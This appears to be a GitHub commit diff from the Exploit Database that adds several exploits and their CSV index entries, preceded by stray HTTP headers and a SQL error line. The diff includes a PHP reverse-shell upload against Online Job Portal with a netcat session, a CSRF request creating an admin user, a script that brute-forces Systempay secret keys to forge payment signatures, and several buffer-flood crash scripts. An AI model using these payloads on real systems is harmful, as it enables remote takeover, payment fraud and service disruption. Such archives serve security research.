Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 167
Connection: close
Content-Type: text/html; charset=UTF-8
Failed to get query handle: SQLSTATE[23000]: Integrity constraint violation: 1062 Duplicate entry '1root@localhost : exploitdb : 10.1.38-MariaDB1' for key 'group_key'
#

33
exploits/php/webapps/48012.txt Normal file
View file

@ -0,0 +1,33 @@
# Exploit Title: Online Job Portal 1.0 - Remote Code Execution
# Dork: N/A
# Date: 2020-02-06
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/jobportal.zip
# Version: 1.0
# Tested on: Linux
# CVE: N/A
# POC:
# 1)
#
curl -i -s -k -X $'POST' \
-H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: multipart/form-data; boundary=---------------------------1852293616672951051689730436' -H $'Content-Length: 781' -H $'Referer: http://localhost/[PATH]/admin/user/index.php?view=view' -H $'Cookie: PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
-b $'PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' \
--data-binary $'-----------------------------1852293616672951051689730436\x0d\x0aContent-Disposition: form-data; name=\"mealid\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------1852293616672951051689730436\x0d\x0aContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\x0d\x0a\x0d\x0a1000000\x0d\x0a-----------------------------1852293616672951051689730436\x0d\x0aContent-Disposition: form-data; name=\"photo\"; filename=\"exp.php\"\x0d\x0aContent-Type: application/x-php\x0d\x0a\x0d\x0aGIF89c;\x0d\x0a<?php $sock = fsockopen(\'192.168.1.104\',6666);\x0d\x0a$descriptorspec = array(\x0d\x0a0 => $sock,\x0d\x0a1 => $sock,\x0d\x0a2 => $sock\x0d\x0a);\x0d\x0a\x0d\x0a$process = proc_open(\'/bin/sh\', $descriptorspec, $pipes);\x0d\x0aproc_close($process);?>\x0d\x0a\x0d\x0a-----------------------------1852293616672951051689730436\x0d\x0aContent-Disposition: form-data; name=\"savephoto\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------1852293616672951051689730436--\x0d\x0a' \
$'http://localhost/[PATH]/admin/user/controller.php?action=photos'
#
curl -i -s -k -X $'GET' \
-H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3' -H $'Accept-Encoding: gzip, deflate' -H $'Cookie: PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
-b $'PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' \
$'http://localhost/[PATH]/admin/user/photos/exp.php'
#
root@ihsan:~/ExploitDB# nc -nlvp 6666
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::6666
Ncat: Listening on 0.0.0.0:6666
Ncat: Connection from 192.168.1.104.
Ncat: Connection from 192.168.1.104:35574.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
#

49
exploits/php/webapps/48016.txt Normal file
View file

@ -0,0 +1,49 @@
# Exploit Title: Online Job Portal 1.0 - Cross Site Request Forgery (Add User)
# Dork: N/A
# Date: 2020-02-06
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/jobportal.zip
# Version: 1.0
# Tested on: Linux
# CVE: N/A
# POC:
# 1)
# Add User..
#
POST /admin/user/controller.php?action=add HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 106
Cookie: PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
user_id=1&deptid=&U_NAME=hacker&deptid=&U_USERNAME=hacker&deptid=&U_PASS=hacker&U_ROLE=Administrator&save=
#
# POC:
# 2)
# Edit User..
#
POST /admin/user/controller.php?action=edit HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 121
Cookie: PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
user_id=1&deptid=&U_NAME=hacker_edit&deptid=&U_USERNAME=hacker_edit&deptid=&U_PASS=hacker_edit&U_ROLE=Administrator&save=
#

98
exploits/php/webapps/48017.php Normal file
View file

@ -0,0 +1,98 @@
# Exploit Title: Ecommerce Systempay 1.0 - Production KEY Brute Force
# Author: live3
# Date: 2020-02-05
# Vendor Homepage: https://paiement.systempay.fr/doc/fr-FR/
# Software Link: https://paiement.systempay.fr/doc/fr-FR/module-de-paiement-gratuit/
# Tested on: MacOs
# Version: ALL
<?php
/**
*
* INFORMATION
* Exploit Title: Ecommerce Systempay decode secret production KEY / Brute Force
* Author: live3
* Date: 2020-02-05
* Vendor Homepage: https://paiement.systempay.fr/doc/fr-FR/
* Tested on: MacOs
* Version: ALL
* Prerequisite: Find a ecommerce who is using Systempay AND SHA1 to crypt signature.
* Put some product on cart and choose systempay for payment method.
* get all data from post sent to https://paiement.systempay.fr/vads-payment/
* keep signature as reference and all vads fields to create new signature.
* Use script to make a brute force on Secret product key (16 char length)
*
* Usage: Once you have the production KEY all modifications on form data will be accepted by systempay ! (You will just generate new signature with your changes)
* You will be able to generate a success payment return !
*
* FOR EDUCATIONAL PURPOSES ONLY. DO NOT USE THIS SCRIPT FOR ILLEGAL ACTIVITIES.
* THE AUTHOR IS NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE.
*
*/
// Set the start number you want (16 char length)
$last_key_check = '1000000000000000';
// Assign var
$array_key = array();
$sentence = '';
$how_many_key_to_check_for_loop = 10;
// Put here signature extract from POST DATA
// Example of SHA1 from string : test
$signature_from_post = 'a94a8fe5ccb19ba61c4c0873d391e987982fbbd3';
// Copy paste your content decoded of POST DATA
$form_data = '
vads_field_1: VALUE1
vads_field_2: VALUE2
// AND ALL OTHER FIELDS...
';
$array = explode(PHP_EOL, $form_data);
foreach ($array as $data) {
if ($data != '') {
$elements = explode(': ', $data);
if (!empty($elements)) {
$array_key[trim($elements[0])] = $elements[1];
}
}
}
ksort($array_key);
foreach ($array_key as $value) {
$sentence .= $value . '+';
}
echo 'Signature from POST DATA : '.$signature_from_post.'<br/>';
$found = false;
$get_key = '';
// first check
if (sha1($sentence.$last_key_check) != $signature_from_post) {
for ($i = $last_key_check; $i <= $last_key_check+$how_many_key_to_check_for_loop; $i++) {
$get_key = $i;
if (sha1($sentence.$i) == $signature_from_post) {
echo 'Key found : '.$i.'<br/>';
$found = true;
break;
}
}
} else {
$found = true;
}
if ($found) {
$test_sha = sha1($sentence.$get_key);
echo 'Signature calc : '.$test_sha.'<br/><hr/>';
} else {
echo 'Last key check : '.$get_key.'<br/><hr/>';
}
echo 'Your sequence : '.$sentence.'<br/>';

22
exploits/windows/dos/48005.py Executable file
View file

@ -0,0 +1,22 @@
# Exploit Title: AbsoluteTelnet 11.12 - "license name" Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 2020-02-05
# Vendor Homepage: https://www.celestialsoftware.net/
# Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet11.12.exe
# Tested Version: 11.12
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es
#Steps to produce the crash:
#1.- Run python code: AbsoluteTelent 11.12_license_code.py
#2.- Open AbsoluteTelent_license_code.txt and copy content to clipboard
#3.- Open AbsoluteTelnet.exe
#4.- Select "Help" > "Enter License Key"
#5.- In "License code" paste Clipboard
#6.- Crashed
cod = "\x41" * 2500
f = open('AbsoluteTelent_license_code.txt', 'w')
f.write(cod)
f.close()

23
exploits/windows/dos/48006.py Executable file
View file

@ -0,0 +1,23 @@
# Exploit Title: AbsoluteTelnet 11.12 - "license name" Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 2020-02-05
# Vendor Homepage: https://www.celestialsoftware.net/
# Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet11.12.exe
# Tested Version: 11.12
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es
#Steps to produce the crash:
#1.- Run python code: AbsoluteTelent 11.12_license_name.py
#2.- Open AbsoluteTelent_license_name.txt and copy content to clipboard
#3.- Open AbsoluteTelnet.exe
#4.- Select "Help" > "Enter License Key"
#5.- In "License Name" paste Clipboard
#6.- Crashed
cod = "\x41" * 2500
f = open('AbsoluteTelent_license_name.txt', 'w')
f.write(cod)
f.close()

22
exploits/windows/dos/48010.py Executable file
View file

@ -0,0 +1,22 @@
# Exploit Title: AbsoluteTelnet 11.12 - 'SSH2/username' Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 2020-02-05
# Vendor Homepage: https://www.celestialsoftware.net/
# Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet11.12.exe
# Tested Version: 11.12
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es
#Steps to produce the crash:
#1.- Run python code: AbsoluteTelnet 11.12_username_ssh2.py
#2.- Open absolutetelnet_username_SSH2.txtabsolutetelnet_username.txt and copy content to clipboard
#3.- Open AbsoluteTelnet
#4.- Select "new connection file", "Connection", "SSH2", "Use last username"
#5.- In "username" field paste Clipboard
#6.- Select "OK"
#7.- Crashed
buffer = "\x41" * 1000
f = open ("absolutetelnet_username_SSH2.txt", "w")
f.write(buffer)
f.close()

24
exploits/windows/dos/48011.py Executable file
View file

@ -0,0 +1,24 @@
# Exploit Title: TapinRadio 2.12.3 - 'address' Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 2020-02-05
# Vendor Homepage: http://www.raimersoft.com/rarmaradio.html
# Software Link : http://www.raimersoft.com/downloads/tapinradio_setup_x64.exe
# Tested Version: 2.12.3
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es
#Steps to produce the crash:
#1.- Run python code: tapinadio_address.py
#2.- Open tapin_add.txt and copy content to clipboard
#3.- Open TapinRadio
#4.- Select "Settings" > "Preferences" > "Miscellaneous"
#5.- Select "Set Application Proxy..."" In "Address" field paste Clipboard
#6.- In Port type "444" > "Username" type "test" > Password type "1234"
#7.- Select "OK" and "OK"
#8.- Crashed
cod = "\x41" * 3000
f = open('tapin_add.txt', 'w')
f.write(cod)
f.close()

24
exploits/windows/dos/48013.py Executable file
View file

@ -0,0 +1,24 @@
# Exploit Title: TapinRadio 2.12.3 - 'username' Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 2020-02-05
# Vendor Homepage: http://www.raimersoft.com/rarmaradio.html
# Software Link : http://www.raimersoft.com/downloads/tapinradio_setup_x64.exe
# Tested Version: 2.12.3
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es
#Steps to produce the crash:
#1.- Run python code: tapinadio_user.py
#2.- Open tapin_user.txt and copy content to clipboard
#3.- Open TapinRadio
#4.- Select "Settings" > "Preferences" > "Miscellaneous"
#5.- Select "Set Application Proxy..."" In "Username" field paste Clipboard
#6.- In Server type "1.1.1.1" > Port type 444 > Password type "1234"
#7.- Select "OK" and "OK"
#8.- Crashed
cod = "\x41" * 10000
f = open('tapin_user.txt', 'w')
f.write(cod)
f.close()

21
exploits/windows/dos/48014.py Executable file
View file

@ -0,0 +1,21 @@
# Exploit Title: RarmaRadio 2.72.4 - 'username' Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 2020-02-05
# Vendor Homepage: http://www.raimersoft.com/rarmaradio.html
# Software Link : http://www.raimersoft.com/downloads/rarmaradio_setup.exe
# Tested Version: 2.72.4
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es
#Steps to produce the crash:
#1.- Run python code: rarmaradio_username.py
#2.- Open RarmaRadio2.72.4_username.txt and copy content to clipboard
#3.- Open RarmaRadio
#4.- Select "Edit" > "Settings" > "Network"
#5.- In "Username" field paste Clipboard
#6.- Select "OK"
#7.- Crashed
buffer = "\x41" * 5000
f = open ("RarmaRadio2.72.4_username.txt", "w")
f.write(buffer)
f.close()

22
exploits/windows/dos/48015.py Executable file
View file

@ -0,0 +1,22 @@
# Exploit Title: RarmaRadio 2.72.4 - 'server' Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 05-02-2020
# Vendor Homepage: http://www.raimersoft.com/rarmaradio.html
# Software Link : http://www.raimersoft.com/downloads/rarmaradio_setup.exe
# Tested Version: 2.72.4
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es
# Steps to produce the crash:
#1.- Run python code: RarmaRadio2.72.4_server.py
#2.- Open RarmaRadio2.72.4_server.txt and copy content to clipboard
#3.- Open RarmaRadio
#4.- Select "Edit" > "Settings" > "Network"
#5.- In "Server" field paste Clipboard
#6.- Select "OK"
#7.- Crashed
buffer = "\x41" * 4000
f = open ("RarmaRadio2.72.4_server.txt", "w")
f.write(buffer)
f.close()

25
exploits/windows/local/48009.txt Normal file
View file

@ -0,0 +1,25 @@
#Exploit Title: ELAN Smart-Pad 11.10.15.1 - 'ETDService' Unquoted Service Path
#Exploit Author : ZwX
#Exploit Date: 2020-02-05
#Vendor : ELAN Microelectronics
#Vendor Homepage : http://www.emc.com.tw/
#Tested on OS: Windows 10 v1803
#Analyze PoC :
==============
C:\Users\ZwX>sc qc ETDService
[SC] QueryServiceConfig réussite(s)
SERVICE_NAME: ETDService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Elantech\ETDService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Elan Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

16
files_exploits.csv
View file

@ -6666,6 +6666,14 @@ id,file,description,date,author,type,platform,port
47970,exploits/multiple/dos/47970.txt,"macOS/iOS ImageIO - Heap Corruption when Processing Malformed TIFF Image",2020-01-28,"Google Security Research",dos,multiple, 47970,exploits/multiple/dos/47970.txt,"macOS/iOS ImageIO - Heap Corruption when Processing Malformed TIFF Image",2020-01-28,"Google Security Research",dos,multiple,
47987,exploits/linux/dos/47987.cs,"BearFTP 0.1.0 - 'PASV' Denial of Service",2020-02-03,kolya5544,dos,linux, 47987,exploits/linux/dos/47987.cs,"BearFTP 0.1.0 - 'PASV' Denial of Service",2020-02-03,kolya5544,dos,linux,
47993,exploits/ios/dos/47993.py,"P2PWIFICAM2 for iOS 10.4.1 - 'Camera ID' Denial of Service (PoC)",2020-02-03,"Ivan Marmolejo",dos,ios, 47993,exploits/ios/dos/47993.py,"P2PWIFICAM2 for iOS 10.4.1 - 'Camera ID' Denial of Service (PoC)",2020-02-03,"Ivan Marmolejo",dos,ios,
48005,exploits/windows/dos/48005.py,"AbsoluteTelnet 11.12 - _license name_ Denial of Service (PoC)",2020-02-06,chuyreds,dos,windows,
48006,exploits/windows/dos/48006.py,"AbsoluteTelnet 11.12 - 'license name' Denial of Service (PoC)",2020-02-06,chuyreds,dos,windows,
48008,exploits/linux/dos/48008.txt,"VIM 8.2 - Denial of Service (PoC)",2020-02-06,"Dhiraj Mishra",dos,linux,
48010,exploits/windows/dos/48010.py,"AbsoluteTelnet 11.12 - 'SSH2/username' Denial of Service (PoC)",2020-02-06,chuyreds,dos,windows,
48011,exploits/windows/dos/48011.py,"TapinRadio 2.12.3 - 'address' Denial of Service (PoC)",2020-02-06,chuyreds,dos,windows,
48013,exploits/windows/dos/48013.py,"TapinRadio 2.12.3 - 'username' Denial of Service (PoC)",2020-02-06,chuyreds,dos,windows,
48014,exploits/windows/dos/48014.py,"RarmaRadio 2.72.4 - 'username' Denial of Service (PoC)",2020-02-06,chuyreds,dos,windows,
48015,exploits/windows/dos/48015.py,"RarmaRadio 2.72.4 - 'server' Denial of Service (PoC)",2020-02-06,chuyreds,dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10928,6 +10936,7 @@ id,file,description,date,author,type,platform,port
47995,exploits/linux/local/47995.txt,"Sudo 1.8.25p - Buffer Overflow",2020-02-04,"Joe Vennix",local,linux, 47995,exploits/linux/local/47995.txt,"Sudo 1.8.25p - Buffer Overflow",2020-02-04,"Joe Vennix",local,linux,
47999,exploits/linux/local/47999.txt,"Socat 1.7.3.4 - Heap-Based Overflow (PoC)",2020-02-05,hieubl,local,linux, 47999,exploits/linux/local/47999.txt,"Socat 1.7.3.4 - Heap-Based Overflow (PoC)",2020-02-05,hieubl,local,linux,
48000,exploits/linux/local/48000.sh,"xglance-bin 11.00 - Privilege Escalation",2020-02-05,redtimmysec,local,linux, 48000,exploits/linux/local/48000.sh,"xglance-bin 11.00 - Privilege Escalation",2020-02-05,redtimmysec,local,linux,
48009,exploits/windows/local/48009.txt,"ELAN Smart-Pad 11.10.15.1 - 'ETDService' Unquoted Service Path",2020-02-06,ZwX,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -42300,3 +42309,10 @@ id,file,description,date,author,type,platform,port
48001,exploits/java/webapps/48001.py,"Kronos WebTA 4.0 - Authenticated Remote Privilege Escalation",2020-02-05,nxkennedy,webapps,java, 48001,exploits/java/webapps/48001.py,"Kronos WebTA 4.0 - Authenticated Remote Privilege Escalation",2020-02-05,nxkennedy,webapps,java,
48002,exploits/json/webapps/48002.py,"Verodin Director Web Console 3.5.4.0 - Remote Authenticated Password Disclosure (PoC)",2020-02-05,nxkennedy,webapps,json, 48002,exploits/json/webapps/48002.py,"Verodin Director Web Console 3.5.4.0 - Remote Authenticated Password Disclosure (PoC)",2020-02-05,nxkennedy,webapps,json,
48003,exploits/json/webapps/48003.txt,"AVideo Platform 8.1 - Cross Site Request Forgery (Password Reset)",2020-02-05,"Ihsan Sencan",webapps,json, 48003,exploits/json/webapps/48003.txt,"AVideo Platform 8.1 - Cross Site Request Forgery (Password Reset)",2020-02-05,"Ihsan Sencan",webapps,json,
48007,exploits/php/webapps/48007.txt,"Online Job Portal 1.0 - 'user_email' SQL Injection",2020-02-06,"Ihsan Sencan",webapps,php,
48012,exploits/php/webapps/48012.txt,"Online Job Portal 1.0 - Remote Code Execution",2020-02-06,"Ihsan Sencan",webapps,php,
48016,exploits/php/webapps/48016.txt,"Online Job Portal 1.0 - Cross Site Request Forgery (Add User)",2020-02-06,"Ihsan Sencan",webapps,php,
48017,exploits/php/webapps/48017.php,"Ecommerce Systempay 1.0 - Production KEY Brute Force",2020-02-06,live3,webapps,php,
48018,exploits/java/webapps/48018.py,"Cisco Data Center Network Manager 11.2 - Remote Code Execution",2020-02-06,mr_me,webapps,java,
48019,exploits/java/webapps/48019.py,"Cisco Data Center Network Manager 11.2.1 - 'getVmHostData' SQL Injection",2020-02-06,mr_me,webapps,java,
48020,exploits/java/webapps/48020.py,"Cisco Data Center Network Manager 11.2.1 - 'LanFabricImpl' Command Injection",2020-02-06,mr_me,webapps,java,

Can't render this file because it is too large.